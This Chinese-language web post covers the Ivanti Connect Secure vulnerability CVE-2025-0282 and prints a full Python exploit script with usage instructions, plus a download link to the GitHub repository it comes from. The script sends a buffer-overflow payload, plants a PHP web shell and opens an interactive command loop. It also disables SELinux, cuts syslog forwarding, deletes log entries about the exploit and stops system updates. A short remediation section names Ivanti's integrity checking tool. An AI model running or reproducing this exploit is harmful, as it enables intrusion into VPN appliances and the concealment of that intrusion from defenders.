目录导航
CVE-2025-0282简介
CVE-2025-0282 是 Ivanti Connect Secure 中发现的一个严重漏洞,允许通过缓冲区溢出漏洞执行远程命令执行 (RCE)。此漏洞使攻击者能够上传恶意文件(例如,Web Shell)并以提升的权限在目标系统上执行命令。
受影响的版本
CVE名称 | 产品名称 | 受影响的版本 | 受影响的 CPE | 已解决的版本 | 补丁下载地址 |
CVE-2025-0282 | Ivanti Connect Secure | 22.7R2 至 22.7R2.4 | cpe:2.3:a:ivanti:connect_secure:22.7:R2.4:*:*:*:*.*.* | 22.7R2.5 | Download Portal https://portal.ivanti.com/ |
CVE-2025-0283 | Ivanti Connect Secure | 22.7R2.4 及之前版本, 9.1R18.9 及之前版本 | cpe:2.3:a:ivanti:connect_secure:22.7:R2.4:*:*:*:*.*.* | 22.7R2.5 | Download Portal https://portal.ivanti.com/ |
CVE-2025-0282 | Ivanti Policy Secure | 22.7R1 至 22.7R1.2 | cpe:2.3:a:ivanti:policy_secure:22.7:r1.2:*:*:*:*.*. | Patch planned availability Jan. 21 | |
CVE-2025-0283 | Ivanti Policy Secure | 22.7R1.2 及之前版本 | cpe:2.3:a:ivanti:policy_secure:22.7:r1.2:*:*:*:*.*. | Patch planned availability Jan. 21 | |
CVE-2025-0282 | Ivanti Neurons for ZTA gateways | 22.7R2 至 22.7R2.3 | N/A | 22.7R2.5 | Patch planned availability Jan. 21 |
CVE-2025-0283 | Ivanti Neurons for ZTA gateways | 22.7R2.3 及之前版本 | N/A | 22.7R2.5 | Patch planned availability Jan. 21 |
CVE-2025-0282 exp 下载地址
https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit/archive/refs/heads/main.zip
CVE_2025_0282_Ivanti.py
import requests
import sys
import struct
import socket
import ssl
import urllib3
import time
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008):
payload = b"A" * offset # Fill the buffer
payload += struct.pack("<I", system_address) # Overwrite return address with system()
payload += b"BBBB" # Fake return address
payload += struct.pack("<I", command_address) # Address of the command
payload += command.encode() # Command to execute
return payload
def send_payload(target_ip, payload):
try:
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
ssl_sock = context.wrap_socket(sock, server_hostname=target_ip)
ssl_sock.connect((target_ip, 443))
print(f"[+] Connected to {target_ip} on port 443 (HTTPS).")
exploit_endpoint = "/dana-na/auth/url_default/welcome.cgi"
http_request = (
f"POST {exploit_endpoint} HTTP/1.1\r\n"
f"Host: {target_ip}\r\n"
f"Content-Length: {len(payload)}\r\n"
f"Content-Type: application/x-www-form-urlencoded\r\n"
f"\r\n"
).encode() + payload
ssl_sock.send(http_request)
response = ssl_sock.recv(4096)
ssl_sock.close()
return response.decode(errors="replace")
except Exception as e:
print(f"[-] Error sending payload: {e}")
return None
def exploit_vulnerability(target_ip, command):
payload = create_exploit_payload(command)
response = send_payload(target_ip, payload)
if response:
print("[+] Payload sent successfully.")
else:
print("[-] No response received.")
def upload_web_shell(target_ip, local_shell_path):
try:
with open(local_shell_path, "r") as f:
web_shell_content = f.read()
command = f"echo '{web_shell_content}' > /shell.php"
exploit_vulnerability(target_ip, command)
print("[+] Web shell uploaded successfully at /shell.php.")
verify_shell(target_ip)
except Exception as e:
print(f"[-] Error uploading web shell: {e}")
def verify_shell(target_ip):
shell_url = f"http://{target_ip}/shell.php"
try:
response = requests.get(shell_url, verify=False, timeout=10)
if response.status_code == 200:
print("[+] Web shell is accessible.")
else:
print(f"[-] Web shell is not accessible. HTTP status: {response.status_code}")
except Exception as e:
print(f"[-] Error verifying web shell: {e}")
def execute_shell_command(target_ip, command):
shell_url = f"http://{target_ip}/shell.php"
try:
response = requests.post(shell_url, data={"cmd": command}, verify=False, timeout=10)
if response.status_code == 200:
print(f"[+] Command output:\n{response.text.strip()}")
else:
print(f"[-] Failed to execute command via shell. HTTP status: {response.status_code}")
except Exception as e:
print(f"[-] Error executing command via web shell: {e}")
def disable_selinux(target_ip):
command = "setenforce 0"
execute_shell_command(target_ip, command)
print("[+] SELinux disabled.")
def prevent_syslog_forwarding(target_ip):
command = "sed -i '/^*.* @/d' /etc/rsyslog.conf"
execute_shell_command(target_ip, command)
command = "systemctl restart rsyslog"
execute_shell_command(target_ip, command)
print("[+] Syslog forwarding disabled.")
def remount_drive_rw(target_ip):
command = "mount -o remount,rw /"
execute_shell_command(target_ip, command)
print("[+] Drive remounted as read-write.")
def remove_log_entries(target_ip):
command = "sed -i '/CVE-2025-0282/d' /var/log/*"
execute_shell_command(target_ip, command)
print("[+] Log entries related to the exploit removed.")
def enable_selinux(target_ip):
command = "setenforce 1"
execute_shell_command(target_ip, command)
print("[+] SELinux re-enabled.")
def remount_drive_ro(target_ip):
command = "mount -o remount,ro /"
execute_shell_command(target_ip, command)
print("[+] Drive remounted as read-only.")
def disable_updates(target_ip):
commands = [
"systemctl stop apt-daily.service",
"systemctl disable apt-daily.service"
]
for command in commands:
execute_shell_command(target_ip, command)
print("[+] System updates disabled successfully.")
def main():
if len(sys.argv) != 3:
print("Usage: python3 cve_2025_0282.py <target IP> <local_shell_path>")
sys.exit(1)
target_ip = sys.argv[1]
local_shell_path = sys.argv[2]
upload_web_shell(target_ip, local_shell_path)
disable_selinux(target_ip)
prevent_syslog_forwarding(target_ip)
remount_drive_rw(target_ip)
remove_log_entries(target_ip)
enable_selinux(target_ip)
remount_drive_ro(target_ip)
while True:
command = input("Enter command to execute on the target (or 'exit' to quit): ")
if command.lower() == "exit":
print("Exiting...")
break
execute_shell_command(target_ip, command)
if __name__ == "__main__":
main()
上传 Web Shell命令
要使用该工具将 Web Shell 上传到目标系统:
python3 CVE_2025_0282_Ivanti.py <target_ip> <local_shell_path>
- <target_ip>:目标服务器的 IP 地址。
- <local_shell_path>:本地计算机上的 Web Shell 文件的路径。
执行远程命令
成功上传Webshell后,该工具允许你以交互方式在目标系统上执行命令。

修复建议
Ivanti 客户可以利用其完整性检查工具 (ICT)来识别 CVE-2025-0282 的利用。
对于 Connect Secure 客户,Ivanti 建议在升级到 22.7R2.5 版本之前,出于“谨慎考虑”,对 ICT 扫描结果干净的设备执行恢复出厂设置,并“确保删除所有恶意软件”,如果 ICT 结果“显示出受损迹象”。
Ivanti 产品安全事件响应团队 (PSIRT) 推出了一款新工具,以增强您确保 Ivanti Connect Secure 和 Ivanti Policy Secure 软件完全完整性的能力。
本文介绍了我们新开发的 Ivanti Connect Secure/Ivanti Policy Secure 完整性工具并提供了快速入门指南。
完整性工具可让管理员验证虚拟或硬件设备上安装的 ICS/IPS 映像。此工具可检查整个文件系统的完整性并查找任何附加/修改的文件。
过去,入侵者主要针对基础设施设备。虽然入侵者可以对网络设备执行多种类型的攻击,但恶意行为者现在正在寻找破坏基础设施设备正常行为的方法。
一般来说,这些入侵者可以获得访问权限,通常是通过利用系统上的漏洞或可能通过多种社会工程攻击来操纵授权用户。
请参阅安全公告部分了解所有漏洞和披露。
完整性检查工具 (ICT)下载地址
注意:完整性工具只能用于检查正在运行的代码版本的完整性。
诚信工具 | 下载 |
完整性检查工具 | 下载 |
适用于特定服务器类型和版本的完整性检查工具包
服务器类型和版本 | 诚信工具包 |
Ivanti Connect Secure 22.X_R1 | ICS_22.xR1_ICT_package-2511.1.pkg |
Ivanti Connect Secure 22.X_R2 | ICS_22.xR2 ICT_package-2515.1.pkg |
Ivanti Connect Secure 9.X | ICS_9.x ICT_package-24793.1.pkg |
Ivanti Policy Secure 22.XR1 | IPS_22.xR1 ICT_package-605.1.pkg |
Ivanti Policy Secure 9.X | IPS_9.x ICT_package-9953.1.pkg |
官方公布详情
漏洞细节
https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day
项目地址
GitHub:
https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit
转载请注明出处及链接